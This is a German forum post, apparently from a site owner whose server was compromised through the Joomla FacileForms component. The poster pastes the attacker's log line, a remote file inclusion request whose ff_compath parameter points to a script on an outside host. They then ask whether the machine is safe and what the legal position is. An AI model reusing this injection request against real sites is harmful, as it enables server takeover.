
Zitat von
tkd
Hallo,
mich hat es auch erwischt und es liefen ca. 30 [v6] prozesse, als ich es bemerkt habe. Der Aufruf fand statt wie vorhin schon angegeben:
"GET /components/com_facileforms/
facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HT
TP/1.1" 200 524 "-" "libwww-perl/5.803"
und auch der download von v6.txt ist nachweislich erfolgt. Leider kann ich die Datei aber nirgends finden, ich nehme an sie wurde beim wechsel zu runlevel 1 gelöscht.
Ich denke, es wäre trotzdem nicht sicher, das System jetzt (nat. ohne facile-forms) wieder so ans netz zu lassen, oder kann mir jmd. bestätigen das v6.txt keine Manipulation an anderen Dateien vornimmt?
Wie ist denn die Rechtslage bei so einem Angriff?
Vielen Dank
Lesezeichen